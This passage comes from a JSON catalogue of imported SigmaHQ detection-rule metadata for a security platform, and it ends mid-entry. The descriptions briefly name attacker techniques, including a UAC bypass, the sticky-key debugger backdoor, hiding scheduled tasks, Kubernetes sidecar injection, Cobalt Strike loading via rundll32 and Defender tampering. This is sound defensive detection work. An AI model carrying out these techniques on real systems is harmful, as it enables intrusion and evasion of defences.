"id": "sigmahq-sigma-ac175779-025a-4f12-98b0-acdaeb77ea85", "type": "detection", "name": "PowerShell Script Run in AppData", "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-script-run-in-appdata.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ac175779-025a-4f12-98b0-acdaeb77ea85", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml" } }, { "id": "sigmahq-sigma-ac1c92b4-ac81-405a-9978-4604d78cc47e", "type": "detection", "name": "Potential Binary Proxy Execution Via VSDiagnostics.EXE", "description": "Detects execution of \"VSDiagnostics.exe\" with the \"start\" command in order to launch and proxy arbitrary binaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-binary-proxy-execution-via-vsdiagnostics-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ac1c92b4-ac81-405a-9978-4604d78cc47e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml" } }, { "id": "sigmahq-sigma-ac20ae82-8758-4f38-958e-b44a3140ca88", "type": "detection", "name": "Invoke-Obfuscation Via Use MSHTA", "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-mshta.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ac20ae82-8758-4f38-958e-b44a3140ca88", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" } }, { "id": "sigmahq-sigma-ac7102b4-9e1e-4802-9b4f-17c5524c015c", "type": "detection", "name": "New PowerShell Instance Created", "description": "Detects the execution of PowerShell via the creation of a named pipe starting with PSHost", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-powershell-instance-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml" } }, { "id": "sigmahq-sigma-ac8866c7-ce44-46fd-8c17-b24acff96ca8", "type": "detection", "name": "HybridConnectionManager Service Installation - Registry", "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1608" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hybridconnectionmanager-service-installation-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml" } }, { "id": "sigmahq-sigma-ac9159cc-c364-4304-8f0a-d63fc1a0aabb", "type": "detection", "name": "ClickOnce Trust Prompt Tampering", "description": "Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clickonce-trust-prompt-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ac9159cc-c364-4304-8f0a-d63fc1a0aabb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_clickonce_trust_prompt.yml" } }, { "id": "sigmahq-sigma-acd74772-5f88-45c7-956b-6a7b36c294d2", "type": "detection", "name": "Removal Of SD Value to Hide Schedule Task - Registry", "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. This technique is used by Tarrask malware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/removal-of-sd-value-to-hide-schedule-task-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "acd74772-5f88-45c7-956b-6a7b36c294d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml" } }, { "id": "sigmahq-sigma-ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d", "type": "detection", "name": "Remote Schedule Task Lateral Movement via ITaskSchedulerService", "description": "Detects remote RPC calls to create or execute a scheduled task", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053", "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-schedule-task-lateral-movement-via-itaskschedulerservice.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" } }, { "id": "sigmahq-sigma-acf61bd8-d814-4272-81f0-a7a269aa69aa", "type": "detection", "name": "Indicator Removal on Host - Clear Mac System Logs", "description": "Detects deletion of local audit logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/indicator-removal-on-host-clear-mac-system-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "acf61bd8-d814-4272-81f0-a7a269aa69aa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml" } }, { "id": "sigmahq-sigma-acfa2210-0d71-4eeb-b477-afab494d596c", "type": "detection", "name": "Windows Service Terminated With Error", "description": "Detects Windows services that got terminated for whatever reason", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-service-terminated-with-error.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "acfa2210-0d71-4eeb-b477-afab494d596c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_terminated_error_generic.yml" } }, { "id": "sigmahq-sigma-ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", "type": "detection", "name": "Suspicious WSMAN Provider Image Loads", "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-wsman-provider-image-loads.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_wsman_provider_image_load.yml" } }, { "id": "sigmahq-sigma-ad691d92-15f2-4181-9aa4-723c74f9ddc3", "type": "detection", "name": "Potential Defense Evasion Via Right-to-Left Override", "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis character is used as an obfuscation and masquerading techniques by adversaries to trick users into opening malicious files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-defense-evasion-via-right-to-left-override.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml" } }, { "id": "sigmahq-sigma-ad720b90-25ad-43ff-9b5e-5c841facc8e5", "type": "detection", "name": "User Added to Local Administrators Group", "description": "Detects addition of users to the local administrator group via \"Net\" or \"Add-LocalGroupMember\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-added-to-local-administrators-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml" } }, { "id": "sigmahq-sigma-ad87d14e-7599-4633-ba81-aeb60cfe8cd6", "type": "detection", "name": "Azure Application Gateway Modified or Deleted", "description": "Identifies when a application gateway is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-application-gateway-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ad87d14e-7599-4633-ba81-aeb60cfe8cd6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_application_gateway_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-ad89044a-8f49-4673-9a55-cbd88a1b374f", "type": "detection", "name": "Enabling COR Profiler Environment Variables", "description": "Detects .NET Framework CLR and .NET Core CLR \"cor_enable_profiling\" and \"cor_profiler\" variables being set and configured.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enabling-cor-profiler-environment-variables.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml" } }, { "id": "sigmahq-sigma-ad9012a6-e518-4432-9890-f3b82b8fc71f", "type": "detection", "name": "Potential Sidecar Injection Into Running Deployment", "description": "Detects attempts to inject a sidecar container into a running deployment.\nA sidecar container is an additional container within a pod, that resides alongside the main container.\nOne way to add containers to running resources like Deployments/DeamonSets/StatefulSets, is via a \"kubectl patch\" operation.\nBy injecting a new container within a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separated pod in the cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1609" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-sidecar-injection-into-running-deployment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ad9012a6-e518-4432-9890-f3b82b8fc71f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_sidecar_injection.yml" } }, { "id": "sigmahq-sigma-ad92e3f9-7eb6-460e-96b1-582b0ccbb980", "type": "detection", "name": "UAC Bypass Using MSConfig Token Modification - Process", "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-msconfig-token-modification-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml" } }, { "id": "sigmahq-sigma-ada3bc4f-f0fd-42b9-ba91-e105e8af7342", "type": "detection", "name": "Server Side Template Injection Strings", "description": "Detects SSTI attempts sent via GET requests in access logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1221" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/server-side-template-injection-strings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ada3bc4f-f0fd-42b9-ba91-e105e8af7342", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_ssti_in_access_logs.yml" } }, { "id": "sigmahq-sigma-ada4b0c4-758b-46ac-9033-9004613a150d", "type": "detection", "name": "Modify Group Policy Settings", "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/modify-group-policy-settings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ada4b0c4-758b-46ac-9033-9004613a150d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml" } }, { "id": "sigmahq-sigma-adc9bcc4-c39c-4f6b-a711-1884017bf043", "type": "detection", "name": "Network Sniffing - MacOs", "description": "Detects the usage of tooling to sniff network traffic.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1040" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-sniffing-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "adc9bcc4-c39c-4f6b-a711-1884017bf043", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_network_sniffing.yml" } }, { "id": "sigmahq-sigma-add64136-62e5-48ea-807e-88638d02df1e", "type": "detection", "name": "Fsutil Suspicious Invocation", "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1070", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/fsutil-suspicious-invocation.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "add64136-62e5-48ea-807e-88638d02df1e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_fsutil_usage.yml" } }, { "id": "sigmahq-sigma-adf876b3-f1f8-4aa9-a4e4-a64106feec06", "type": "detection", "name": "Testing Usage of Uncommonly Used Port", "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1571" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/testing-usage-of-uncommonly-used-port.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml" } }, { "id": "sigmahq-sigma-adf9f4d2-559e-4f5c-95be-c28dff0b1476", "type": "detection", "name": "New Country", "description": "Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-country.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "adf9f4d2-559e-4f5c-95be-c28dff0b1476", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_new_coutry_region.yml" } }, { "id": "sigmahq-sigma-ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", "type": "detection", "name": "Unusual File Download From File Sharing Websites - File Stream", "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unusual-file-download-from-file-sharing-websites-file-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml" } }, { "id": "sigmahq-sigma-ae215552-081e-44c7-805f-be16f975c8a2", "type": "detection", "name": "Suspicious Debugger Registration Cmdline", "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-debugger-registration-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ae215552-081e-44c7-805f-be16f975c8a2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml" } }, { "id": "sigmahq-sigma-ae2bdd58-0681-48ac-be7f-58ab4e593458", "type": "detection", "name": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", "description": "Detects attempts to remove Windows Defender configuration using the 'MpPreference' cmdlet", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tamper-windows-defender-remove-mppreference-scriptblocklogging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_tamper_windows_defender_rem_mp.yml" } }, { "id": "sigmahq-sigma-ae48ab93-45f7-4051-9dfe-5d30a3f78e33", "type": "detection", "name": "Spring Framework Exceptions", "description": "Detects suspicious Spring framework exceptions that could indicate exploitation attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/spring-framework-exceptions.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ae48ab93-45f7-4051-9dfe-5d30a3f78e33", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/spring/spring_application_exceptions.yml" } }, { "id": "sigmahq-sigma-ae6f14e6-14de-45b0-9f44-c0986f50dc89", "type": "detection", "name": "Change Default File Association To Executable Via Assoc", "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/change-default-file-association-to-executable-via-assoc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" } }, { "id": "sigmahq-sigma-ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", "type": "detection", "name": "Suspicious PowerShell Invocations - Specific", "description": "Detects suspicious PowerShell invocation command parameters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-invocations-specific.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml" } }, { "id": "sigmahq-sigma-ae9b0bd7-8888-4606-b444-0ed7410cb728", "type": "detection", "name": "Writing Of Malicious Files To The Fonts Folder", "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1211", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/writing-of-malicious-files-to-the-fonts-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ae9b0bd7-8888-4606-b444-0ed7410cb728", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml" } }, { "id": "sigmahq-sigma-ae9c6a7c-9521-42a6-915e-5aaa8689d529", "type": "detection", "name": "CobaltStrike Load by Rundll32", "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cobaltstrike-load-by-rundll32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC 